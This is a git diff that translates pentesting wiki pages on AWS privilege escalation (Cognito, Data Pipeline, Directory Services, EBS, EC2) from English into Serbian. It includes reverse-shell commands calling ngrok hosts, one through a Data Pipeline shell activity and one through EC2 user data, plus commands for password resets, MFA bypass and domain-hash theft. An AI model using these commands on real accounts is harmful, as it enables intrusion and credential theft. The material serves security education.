+Ova dozvola bi omogućila napadaču da **promeni lozinku bilo kog korisnika**, omogućavajući mu da se lažno predstavi kao bilo koji korisnik (koji nema omogućenu MFA).
 ```bash
 aws cognito-idp admin-set-user-password \
-    --user-pool-id  \
-    --username  \
-    --password  \
-    --permanent
+--user-pool-id  \
+--username  \
+--password  \
+--permanent
 ```
-
-**Potential Impact:** Direct privesc to potentially any user, so access to all the groups each user is member of and access to the Identity Pool authenticated IAM role.
+**Potencijalni uticaj:** Direktno privesc za potencijalno bilo kog korisnika, tako da pristup svim grupama čiji je korisnik član i pristup IAM ulozi autentifikovanog Identity Pool-a.
 
 ### `cognito-idp:AdminSetUserSettings` | `cognito-idp:SetUserMFAPreference` | `cognito-idp:SetUserPoolMfaConfig` | `cognito-idp:UpdateUserPool`
 
-**AdminSetUserSettings**: An attacker could potentially abuse this permission to set a mobile phone under his control as **SMS MFA of a user**.
-
+**AdminSetUserSettings**: Napadač bi potencijalno mogao da zloupotrebi ovu dozvolu da postavi mobilni telefon pod njegovom kontrolom kao **SMS MFA korisnika**.
 ```bash
 aws cognito-idp admin-set-user-settings \
-    --user-pool-id  \
-    --username  \
-    --mfa-options 
+--user-pool-id  \
+--username  \
+--mfa-options 
 ```
-
-**SetUserMFAPreference:** Similar to the previous one this permission can be used to set MFA preferences of a user to bypass the MFA protection.
-
+**SetUserMFAPreference:** Slično prethodnom, ova dozvola se može koristiti za postavljanje MFA preferencija korisnika kako bi se zaobišla MFA zaštita.
 ```bash
 aws cognito-idp admin-set-user-mfa-preference \
-    [--sms-mfa-settings ] \
-    [--software-token-mfa-settings ] \
-    --username  \
-    --user-pool-id 
+[--sms-mfa-settings ] \
+[--software-token-mfa-settings ] \
+--username  \
+--user-pool-id 
 ```
-
-**SetUserPoolMfaConfig**: Similar to the previous one this permission can be used to set MFA preferences of a user pool to bypass the MFA protection.
-
+**SetUserPoolMfaConfig**: Slično prethodnom, ova dozvola se može koristiti za postavljanje MFA preferencija korisničkog bazena kako bi se zaobišla MFA zaštita.
 ```bash
 aws cognito-idp set-user-pool-mfa-config \
-    --user-pool-id  \
-    [--sms-mfa-configuration ] \
-    [--software-token-mfa-configuration ] \
-    [--mfa-configuration ]
+--user-pool-id  \
+[--sms-mfa-configuration ] \
+[--software-token-mfa-configuration ] \
+[--mfa-configuration ]
 ```
+**UpdateUserPool:** Takođe je moguće ažurirati korisnički bazen kako bi se promenila MFA politika. [Proverite cli ovde](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool.html).
 
-**UpdateUserPool:** It's also possible to update the user pool to change the MFA policy. [Check cli here](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool.html).
-
-**Potential Impact:** Indirect privesc to potentially any user the attacker knows the credentials of, this could allow to bypass the MFA protection.
+**Potential Impact:** Indirektno privesc potencijalno bilo kojem korisniku čije napredne podatke napadač poznaje, ovo bi moglo omogućiti zaobilaženje MFA zaštite.
 
 ### `cognito-idp:AdminUpdateUserAttributes`
 
-An attacker with this permission could change the email or phone number or any other attribute of a user under his control to try to obtain more privileges in an underlaying application.\
-This allows to change an email or phone number and set it as verified.
-
+Napadač sa ovom dozvolom mogao bi promeniti email ili broj telefona ili bilo koju drugu atributu korisnika pod njegovom kontrolom kako bi pokušao da dobije više privilegija u osnovnoj aplikaciji.\
+Ovo omogućava promenu emaila ili broja telefona i postavljanje kao verifikovanog.
 ```bash
 aws cognito-idp admin-update-user-attributes \
-    --user-pool-id  \
-    --username  \
-    --user-attributes 
+--user-pool-id  \
+--username  \
+--user-attributes 
 ```
-
-**Potential Impact:** Potential indirect privesc in the underlying application using Cognito User Pool that gives privileges based on user attributes.
+**Potencijalni uticaj:** Potencijalni indirektni privesc u osnovnoj aplikaciji koja koristi Cognito User Pool koji daje privilegije na osnovu atributa korisnika.
 
 ### `cognito-idp:CreateUserPoolClient` | `cognito-idp:UpdateUserPoolClient`
 
-An attacker with this permission could **create a new User Pool Client less restricted** than already existing pool clients. For example, the new client could allow any kind of method to authenticate, don't have any secret, have token revocation disabled, allow tokens to be valid for a longer period...
+Napadač sa ovom dozvolom može **napraviti novog User Pool Client-a koji je manje restriktivan** od već postojećih klijenata. Na primer, novi klijent može dozvoliti bilo koju vrstu metode za autentifikaciju, nemati nikakvu tajnu, imati onemogućenu revokaciju tokena, dozvoliti tokenima da budu validni duži period...
 
-The same can be be don if instead of creating a new client, an **existing one is modified**.
-
-In the [**command line**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/create-user-pool-client.html) (or the [**update one**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool-client.html)) you can see all the options, check it!.
+Isto se može uraditi ako se umesto kreiranja novog klijenta, **izmenjuje postojeći**.
 
+U [**komandnoj liniji**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/create-user-pool-client.html) (ili [**ažuriranoj**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool-client.html)) možete videti sve opcije, proverite to!
 ```bash
 aws cognito-idp create-user-pool-client \
-    --user-pool-id  \
-    --client-name  \
-    [...]
+--user-pool-id  \
+--client-name  \
+[...]
 ```
-
-**Potential Impact:** Potential indirect privesc to the Identity Pool authorized user used by the User Pool by creating a new client that relax the security measures and makes possible to an attacker to login with a user he was able to create.
+**Potencijalni uticaj:** Potencijalni indirektni privesc za autorizovanog korisnika Identity Pool-a koji koristi User Pool tako što se kreira novi klijent koji opušta bezbednosne mere i omogućava napadaču da se prijavi sa korisnikom kojeg je mogao da kreira.
 
 ### `cognito-idp:CreateUserImportJob` | `cognito-idp:StartUserImportJob`
 
-An attacker could abuse this permission to create users y uploading a csv with new users.
-
+Napadač bi mogao da zloupotrebi ovu dozvolu da kreira korisnike učitavanjem csv datoteke sa novim korisnicima.
 ```bash
 # Create a new import job
 aws cognito-idp create-user-import-job \
-    --job-name  \
-    --user-pool-id  \
-    --cloud-watch-logs-role-arn 
+--job-name  \
+--user-pool-id  \
+--cloud-watch-logs-role-arn 
 
 # Use a new import job
 aws cognito-idp start-user-import-job \
-    --user-pool-id  \
-    --job-id 
+--user-pool-id  \
+--job-id 
 
 # Both options before will give you a URL where you can send the CVS file with the users to create
 curl -v -T "PATH_TO_CSV_FILE" \
-    -H "x-amz-server-side-encryption:aws:kms" "PRE_SIGNED_URL"
+-H "x-amz-server-side-encryption:aws:kms" "PRE_SIGNED_URL"
 ```
+(U slučaju kada kreirate novi posao za uvoz, možda će vam biti potrebna dozvola iam passrole, još nisam testirao).
 
-(In the case where you create a new import job you might also need the iam passrole permission, I haven't tested it yet).
-
-**Potential Impact:** Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities being able to create any user.
+**Potencijalni uticaj:** Direktno privesc na IAM ulogu identitetskog bazena za autentifikovane korisnike. Indirektno privesc na druge funkcionalnosti aplikacije omogućavajući kreiranje bilo kog korisnika.
 
 ### `cognito-idp:CreateIdentityProvider` | `cognito-idp:UpdateIdentityProvider`
 
-An attacker could create a new identity provider to then be able to **login through this provider**.
-
+Napadač bi mogao da kreira novog provajdera identiteta kako bi mogao da **prijavi se preko ovog provajdera**.
 ```bash
 aws cognito-idp create-identity-provider \
-    --user-pool-id  \
-    --provider-name  \
-    --provider-type  \
-    --provider-details  \
-    [--attribute-mapping ] \
-    [--idp-identifiers ]
+--user-pool-id  \
+--provider-name  \
+--provider-type  \
+--provider-details  \
+[--attribute-mapping ] \
+[--idp-identifiers ]
 ```
+**Potencijalni Uticaj:** Direktno privesc na IAM ulogu identiteta za autentifikovane korisnike. Indirektno privesc na druge funkcionalnosti aplikacije omogućavajući kreiranje bilo kog korisnika.
 
-**Potential Impact:** Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities being able to create any user.
+### cognito-sync:\* Analiza
 
-### cognito-sync:\* Analysis
+Ovo je veoma uobičajena dozvola po defaultu u ulogama Cognito Identity Pools. Čak i ako wildcard u dozvolama uvek izgleda loše (posebno dolazeći iz AWS-a), **date dozvole nisu super korisne iz perspektive napadača**.
 
-This is a very common permission by default in roles of Cognito Identity Pools. Even if a wildcard in a permissions always looks bad (specially coming from AWS), the **given permissions aren't super useful from an attackers perspective**.
+Ova dozvola omogućava čitanje informacija o korišćenju Identity Pools i Identity IDs unutar Identity Pools (što nije osetljiva informacija).\
+Identity IDs mogu imati [**Datasets**](https://docs.aws.amazon.com/cognitosync/latest/APIReference/API_Dataset.html) dodeljene njima, koje su informacije o sesijama (AWS to definiše kao **sačuvanu igru**). Moguće je da ovo sadrži neku vrstu osetljivih informacija (ali je verovatnoća prilično niska). Možete pronaći na [**stranici za enumeraciju**](../aws-services/aws-cognito-enum/) kako da pristupite ovim informacijama.
 
-This permission allows to read use information of Identity Pools and Identity IDs inside Identity Pools (which isn't sensitive info).\
-Identity IDs might have [**Datasets**](https://docs.aws.amazon.com/cognitosync/latest/APIReference/API_Dataset.html) assigned to them, which are information of the sessions (AWS define it like a **saved game**). It might be possible that this contain some kind of sensitive information (but the probability is pretty low). You can find in the [**enumeration page**](../aws-services/aws-cognito-enum/) how to access this information.
+Napadač bi takođe mogao koristiti ove dozvole da **upisuje sebe u Cognito stream koji objavljuje promene** na ovim datasetima ili **lambda koja se aktivira na cognito događaje**. Nisam video da se ovo koristi, i ne bih očekivao osetljive informacije ovde, ali nije nemoguće.
 
-An attacker could also use these permissions to **enroll himself to a Cognito stream that publish changes** on these datases or a **lambda that triggers on cognito events**. I haven't seen this being used, and I wouldn't expect sensitive information here, but it isn't impossible.
+### Automatski Alati
 
-### Automatic Tools
+- [Pacu](https://github.com/RhinoSecurityLabs/pacu), AWS eksploatacioni okvir, sada uključuje module "cognito\_\_enum" i "cognito\_\_attack" koji automatizuju enumeraciju svih Cognito resursa u nalogu i označavaju slabe konfiguracije, atribute korisnika korišćene za kontrolu pristupa, itd., i takođe automatizuju kreiranje korisnika (uključujući podršku za MFA) i privilegiju eskalacije na osnovu modifikabilnih prilagođenih atributa, upotrebljivih kredencijala identiteta, preuzimljivih uloga u id tokenima, itd.
 
-- [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc.
+Za opis funkcija modula pogledajte deo 2 [blog posta](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). Za uputstva za instalaciju pogledajte glavnu [Pacu](https://github.com/RhinoSecurityLabs/pacu) stranicu.
 
-For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page.
-
-#### Usage
-
-Sample cognito\_\_attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client:
+#### Korišćenje
 
+Primer korišćenja cognito\_\_attack za pokušaj kreiranja korisnika i svih privesc vektora protiv datog identiteta i klijenta korisničkog bazena:
 ```bash
 Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools
 us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients
 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX
 ```
-
-Sample cognito\_\_enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account:
-
+Primer korišćenja cognito\_\_enum za prikupljanje svih korisničkih bazena, klijenata korisničkih bazena, identitetskih bazena, korisnika itd. koji su vidljivi u trenutnom AWS nalogu:
 ```bash
 Pacu (new:test) > run cognito__enum
 ```
+- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) je CLI alat u pythonu koji implementira različite napade na Cognito, uključujući eskalaciju privilegija.
 
-- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including a privesc escalation.
-
-#### Installation
-
+#### Instalacija
 ```bash
 $ pip install cognito-scanner
 ```
-
-#### Usage
-
+#### Korišćenje
 ```bash
 $ cognito-scanner --help
 ```
-
-For more information check [https://github.com/padok-team/cognito-scanner](https://github.com/padok-team/cognito-scanner)
+Za više informacija proverite [https://github.com/padok-team/cognito-scanner](https://github.com/padok-team/cognito-scanner)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md
index 82c82682e..98a1fab50 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md
@@ -4,7 +4,7 @@
 
 ## datapipeline
 
-For more info about datapipeline check:
+Za više informacija o datapipeline-u pogledajte:
 
 {{#ref}}
 ../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md
@@ -12,67 +12,57 @@ For more info about datapipeline check:
 
 ### `iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline`
 
-Users with these **permissions can escalate privileges by creating a Data Pipeline** to execute arbitrary commands using the **permissions of the assigned role:**
-
+Korisnici sa ovim **dozvolama mogu eskalirati privilegije kreiranjem Data Pipeline-a** za izvršavanje proizvoljnih komandi koristeći **dozvole dodeljene ulogama:**
 ```bash
 aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string
 ```
-
-After pipeline creation, the attacker updates its definition to dictate specific actions or resource creations:
-
+Nakon kreiranja pipeline-a, napadač ažurira njegovu definiciju kako bi odredio specifične akcije ili kreacije resursa:
 ```json
 {
-  "objects": [
-    {
-      "id": "CreateDirectory",
-      "type": "ShellCommandActivity",
-      "command": "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
-      "runsOn": { "ref": "instance" }
-    },
-    {
-      "id": "Default",
-      "scheduleType": "ondemand",
-      "failureAndRerunMode": "CASCADE",
-      "name": "Default",
-      "role": "assumable_datapipeline",
-      "resourceRole": "assumable_datapipeline"
-    },
-    {
-      "id": "instance",
-      "name": "instance",
-      "type": "Ec2Resource",
-      "actionOnTaskFailure": "terminate",
-      "actionOnResourceFailure": "retryAll",
-      "maximumRetries": "1",
-      "instanceType": "t2.micro",
-      "securityGroups": ["default"],
-      "role": "assumable_datapipeline",
-      "resourceRole": "assumable_ec2_profile_instance"
-    }
-  ]
+"objects": [
+{
+"id": "CreateDirectory",
+"type": "ShellCommandActivity",
+"command": "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
+"runsOn": { "ref": "instance" }
+},
+{
+"id": "Default",
+"scheduleType": "ondemand",
+"failureAndRerunMode": "CASCADE",
+"name": "Default",
+"role": "assumable_datapipeline",
+"resourceRole": "assumable_datapipeline"
+},
+{
+"id": "instance",
+"name": "instance",
+"type": "Ec2Resource",
+"actionOnTaskFailure": "terminate",
+"actionOnResourceFailure": "retryAll",
+"maximumRetries": "1",
+"instanceType": "t2.micro",
+"securityGroups": ["default"],
+"role": "assumable_datapipeline",
+"resourceRole": "assumable_ec2_profile_instance"
+}
+]
 }
 ```
-
 > [!NOTE]
-> Note that the **role** in **line 14, 15 and 27** needs to be a role **assumable by datapipeline.amazonaws.com** and the role in **line 28** needs to be a **role assumable by ec2.amazonaws.com with a EC2 profile instance**.
+> Imajte na umu da **uloga** u **linijama 14, 15 i 27** mora biti uloga **koju može preuzeti datapipeline.amazonaws.com**, a uloga u **liniji 28** mora biti **uloga koju može preuzeti ec2.amazonaws.com sa EC2 profilom instance**.
 >
-> Moreover, the EC2 instance will only have access to the role assumable by the EC2 instance (so you can only steal that one).
-
+> Pored toga, EC2 instanca će imati pristup samo ulozi koju može preuzeti EC2 instanca (tako da možete ukrasti samo tu).
 ```bash
 aws datapipeline put-pipeline-definition --pipeline-id  \
-    --pipeline-definition file:///pipeline/definition.json
+--pipeline-definition file:///pipeline/definition.json
 ```
+**Fajl definicije pipeline-a, koji je kreirao napadač, uključuje direktive za izvršavanje komandi** ili kreiranje resursa putem AWS API-ja, koristeći dozvole uloge Data Pipeline-a da potencijalno stekne dodatne privilegije.
 
-The **pipeline definition file, crafted by the attacker, includes directives to execute commands** or create resources via the AWS API, leveraging the Data Pipeline's role permissions to potentially gain additional privileges.
-
-**Potential Impact:** Direct privesc to the ec2 service role specified.
+**Potencijalni uticaj:** Direktno privesc na ec2 servisnu ulogu koja je navedena.
 
 ## References
 
 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md
index ce24095ed..7e2ba10d4 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md
@@ -4,7 +4,7 @@
 
 ## Directory Services
 
-For more info about directory services check:
+Za više informacija o uslugama direktorijuma pogledajte:
 
 {{#ref}}
 ../aws-services/aws-directory-services-workdocs-enum.md
@@ -12,27 +12,21 @@ For more info about directory services check:
 
 ### `ds:ResetUserPassword`
 
-This permission allows to **change** the **password** of any **existent** user in the Active Directory.\
-By default, the only existent user is **Admin**.
-
+Ova dozvola omogućava **promenu** **lozinke** bilo kog **postojećeg** korisnika u Active Directory.\
+Po defaultu, jedini postojeći korisnik je **Admin**.
 ```
 aws ds reset-user-password --directory-id  --user-name Admin --new-password Newpassword123.
 ```
-
 ### AWS Management Console
 
-It's possible to enable an **application access URL** that users from AD can access to login:
+Moguće je omogućiti **URL za pristup aplikaciji** koji korisnici iz AD mogu koristiti za prijavu:
 
 

 
-And then **grant them an AWS IAM role** for when they login, this way an AD user/group will have access over AWS management console:
+A zatim **dodeliti im AWS IAM ulogu** za kada se prijave, na ovaj način AD korisnik/grupa će imati pristup AWS upravljačkoj konzoli:
 
 

 
-There isn't apparently any way to enable the application access URL, the AWS Management Console and grant permission
+Naizgled ne postoji način da se omogući URL za pristup aplikaciji, AWS upravljačka konzola i dodeli dozvola
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md
index b4af46712..c9a37c55f 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md
@@ -4,7 +4,7 @@
 
 ## dynamodb
 
-For more info about dynamodb check:
+Za više informacija o dynamodb proverite:
 
 {{#ref}}
 ../aws-services/aws-dynamodb-enum.md
@@ -12,16 +12,12 @@ For more info about dynamodb check:
 
 ### Post Exploitation
 
-As far as I know there is **no direct way to escalate privileges in AWS just by having some AWS `dynamodb` permissions**. You can **read sensitive** information from the tables (which could contain AWS credentials) and **write information on the tables** (which could trigger other vulnerabilities, like lambda code injections...) but all these options are already considered in the **DynamoDB Post Exploitation page**:
+Koliko ja znam, **ne postoji direktan način za eskalaciju privilegija u AWS-u samo sa nekim AWS `dynamodb` dozvolama**. Možete **čitati osetljive** informacije iz tabela (koje mogu sadržati AWS akreditive) i **pisati informacije u tabelama** (što može pokrenuti druge ranjivosti, kao što su lambda kod injekcije...) ali sve ove opcije su već razmatrane na **DynamoDB Post Exploitation stranici**:
 
 {{#ref}}
 ../aws-post-exploitation/aws-dynamodb-post-exploitation.md
 {{#endref}}
 
-### TODO: Read data abusing data Streams
+### TODO: Čitati podatke zloupotrebom data Streams
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md
index 36ea3bc53..76528f750 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md
@@ -6,26 +6,22 @@
 
 ### `ebs:ListSnapshotBlocks`, `ebs:GetSnapshotBlock`, `ec2:DescribeSnapshots`
 
-An attacker with those will be able to potentially **download and analyze volumes snapshots locally** and search for sensitive information in them (like secrets or source code). Find how to do this in:
+Napadač sa ovim dozvolama će moći potencijalno **da preuzme i analizira snimke volumena lokalno** i traži osetljive informacije u njima (kao što su tajne ili izvorni kod). Saznajte kako to učiniti u:
 
 {{#ref}}
 ../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md
 {{#endref}}
 
-Other permissions might be also useful such as: `ec2:DescribeInstances`, `ec2:DescribeVolumes`, `ec2:DeleteSnapshot`, `ec2:CreateSnapshot`, `ec2:CreateTags`
+Druge dozvole mogu biti takođe korisne kao što su: `ec2:DescribeInstances`, `ec2:DescribeVolumes`, `ec2:DeleteSnapshot`, `ec2:CreateSnapshot`, `ec2:CreateTags`
 
-The tool [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) performs this attack to e**xtract passwords from a domain controller**.
+Alat [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) vrši ovaj napad da **izvuče lozinke iz kontrolera domena**.
 
-**Potential Impact:** Indirect privesc by locating sensitive information in the snapshot (you could even get Active Directory passwords).
+**Potencijalni uticaj:** Indirektni privesc lociranjem osetljivih informacija u snimku (možete čak dobiti Active Directory lozinke).
 
 ### **`ec2:CreateSnapshot`**
 
-Any AWS user possessing the **`EC2:CreateSnapshot`** permission can steal the hashes of all domain users by creating a **snapshot of the Domain Controller** mounting it to an instance they control and **exporting the NTDS.dit and SYSTEM** registry hive file for use with Impacket's secretsdump project.
+Svaki AWS korisnik koji poseduje **`EC2:CreateSnapshot`** dozvolu može ukrasti hešove svih korisnika domena kreiranjem **snimka Kontrolera domena** montirajući ga na instancu koju kontroliše i **izvozeći NTDS.dit i SYSTEM** registry hive datoteku za korišćenje sa Impacketovim secretsdump projektom.
 
-You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot.
+Možete koristiti ovaj alat za automatizaciju napada: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) ili možete koristiti neku od prethodnih tehnika nakon kreiranja snimka.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md
index ad31bde00..2374ca318 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md
@@ -4,7 +4,7 @@
 
 ## EC2
 
-For more **info about EC2** check:
+Za više **informacija o EC2** proverite:
 
 {{#ref}}
 ../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
@@ -12,51 +12,46 @@ For more **info about EC2** check:
 
 ### `iam:PassRole`, `ec2:RunInstances`
 
-An attacker could **create and instance attaching an IAM role and then access the instance** to steal the IAM role credentials from the metadata endpoint.
+Napadač bi mogao **da kreira instancu povezujući IAM ulogu i zatim pristupi instanci** da ukrade kredencijale IAM uloge sa krajnje tačke metapodataka.
 
-- **Access via SSH**
-
-Run a new instance using a **created** **ssh key** (`--key-name`) and then ssh into it (if you want to create a new one you might need to have the permission `ec2:CreateKeyPair`).
+- **Pristup preko SSH**
 
+Pokrenite novu instancu koristeći **kreirani** **ssh ključ** (`--key-name`) i zatim se povežite na nju putem ssh (ako želite da kreirate novi možda će vam biti potrebna dozvola `ec2:CreateKeyPair`).
 ```bash
 aws ec2 run-instances --image-id  --instance-type t2.micro \
-    --iam-instance-profile Name= --key-name  \
-    --security-group-ids 
+--iam-instance-profile Name= --key-name  \
+--security-group-ids 
 ```
+- **Pristup putem rev shell-a u korisničkim podacima**
 
-- **Access via rev shell in user data**
-
-You can run a new instance using a **user data** (`--user-data`) that will send you a **rev shell**. You don't need to specify security group this way.
-
+Možete pokrenuti novu instancu koristeći **korisničke podatke** (`--user-data`) koji će vam poslati **rev shell**. Na ovaj način ne morate da specificirate bezbednosnu grupu.
 ```bash
 echo '#!/bin/bash
 curl https://reverse-shell.sh/4.tcp.ngrok.io:17031 | bash' > /tmp/rev.sh
 
 aws ec2 run-instances --image-id  --instance-type t2.micro \
-   --iam-instance-profile Name=E \
-   --count 1 \
-   --user-data "file:///tmp/rev.sh"
+--iam-instance-profile Name=E \
+--count 1 \
+--user-data "file:///tmp/rev.sh"
 ```
-
-Be careful with GuradDuty if you use the credentials of the IAM role outside of the instance:
+Budite oprezni sa GuradDuty ako koristite kredencijale IAM uloge van instance:
 
 {{#ref}}
 ../aws-services/aws-security-and-detection-services/aws-guardduty-enum.md
 {{#endref}}
 
-**Potential Impact:** Direct privesc to a any EC2 role attached to existing instance profiles.
+**Potencijalni uticaj:** Direktno privesc na bilo koju EC2 ulogu povezanu sa postojećim profilima instance.
 
-#### Privesc to ECS
-
-With this set of permissions you could also **create an EC2 instance and register it inside an ECS cluster**. This way, ECS **services** will be **run** in inside the **EC2 instance** where you have access and then you can penetrate those services (docker containers) and **steal their ECS roles attached**.
+#### Privesc na ECS
 
+Sa ovim skupom dozvola mogli biste takođe **napraviti EC2 instancu i registrovati je unutar ECS klastera**. Na ovaj način, ECS **usluge** će biti **pokrenute** unutar **EC2 instance** na kojoj imate pristup, a zatim možete prodrijeti u te usluge (docker kontejneri) i **ukrasti njihove ECS uloge povezane**.
 ```bash
 aws ec2 run-instances \
-    --image-id ami-07fde2ae86109a2af \
-    --instance-type t2.micro \
-    --iam-instance-profile  \
-    --count 1 --key-name pwned \
-    --user-data "file:///tmp/asd.sh"
+--image-id ami-07fde2ae86109a2af \
+--instance-type t2.micro \
+--iam-instance-profile  \
+--count 1 --key-name pwned \
+--user-data "file:///tmp/asd.sh"
 
 # Make sure to use an ECS optimized AMI as it has everything installed for ECS already (amzn2-ami-ecs-hvm-2.0.20210520-x86_64-ebs)
 # The EC2 instance profile needs basic ECS access
@@ -64,22 +59,20 @@ aws ec2 run-instances \
 #!/bin/bash
 echo ECS_CLUSTER= >> /etc/ecs/ecs.config;echo ECS_BACKEND_HOST= >> /etc/ecs/ecs.config;
 ```
-
-To learn how to **force ECS services to be run** in this new EC2 instance check:
+Da biste naučili kako da **naterate ECS usluge da se pokreću** na ovoj novoj EC2 instanci, proverite:
 
 {{#ref}}
 aws-ecs-privesc.md
 {{#endref}}
 
-If you **cannot create a new instance** but has the permission `ecs:RegisterContainerInstance` you might be able to register the instance inside the cluster and perform the commented attack.
+Ako **ne možete da kreirate novu instancu** ali imate dozvolu `ecs:RegisterContainerInstance`, možda ćete moći da registrujete instancu unutar klastera i izvršite komentarisani napad.
 
-**Potential Impact:** Direct privesc to ECS roles attached to tasks.
+**Potencijalni uticaj:** Direktno privesc na ECS uloge povezane sa zadacima.
 
 ### **`iam:PassRole`,** **`iam:AddRoleToInstanceProfile`**
 
-Similar to the previous scenario, an attacker with these permissions could **change the IAM role of a compromised instance** so he could steal new credentials.\
-As an instance profile can only have 1 role, if the instance profile **already has a role** (common case), you will also need **`iam:RemoveRoleFromInstanceProfile`**.
-
+Slično prethodnom scenariju, napadač sa ovim dozvolama mogao bi da **promeni IAM ulogu kompromitovane instance** kako bi mogao da ukrade nove akreditive.\
+Pošto profil instance može imati samo 1 ulogu, ako profil instance **već ima ulogu** (uobičajen slučaj), takođe će vam biti potrebna **`iam:RemoveRoleFromInstanceProfile`**.
 ```bash
 # Removing role from instance profile
 aws iam remove-role-from-instance-profile --instance-profile-name  --role-name 
@@ -87,60 +80,50 @@ aws iam remove-role-from-instance-profile --instance-profile-name  --role-
 # Add role to instance profile
 aws iam add-role-to-instance-profile --instance-profile-name  --role-name 
 ```
+Ako **profil instance ima ulogu** i napadač **ne može da je ukloni**, postoji još jedno rešenje. Može **pronaći** **profil instance bez uloge** ili **napraviti novi** (`iam:CreateInstanceProfile`), **dodati** **ulogu** tom **profilu instance** (kao što je ranije objašnjeno), i **povezati profil instance** sa kompromitovanom i**nstancom:**
 
-If the **instance profile has a role** and the attacker **cannot remove it**, there is another workaround. He could **find** an **instance profile without a role** or **create a new one** (`iam:CreateInstanceProfile`), **add** the **role** to that **instance profile** (as previously discussed), and **associate the instance profile** compromised to a compromised i**nstance:**
-
-- If the instance **doesn't have any instance** profile (`ec2:AssociateIamInstanceProfile`) \*
-
+- Ako instanca **nema nijedan profil** instance (`ec2:AssociateIamInstanceProfile`) \*
 ```bash
 aws ec2 associate-iam-instance-profile --iam-instance-profile Name= --instance-id 
 ```
-
-**Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status).
+**Potencijalni Uticaj:** Direktno privesc na drugu EC2 ulogu (morate da ste kompromitovali AWS EC2 instancu i imate dodatne dozvole ili specifičan status profila instanci).
 
 ### **`iam:PassRole`((** `ec2:AssociateIamInstanceProfile`& `ec2:DisassociateIamInstanceProfile`) || `ec2:ReplaceIamInstanceProfileAssociation`)
 
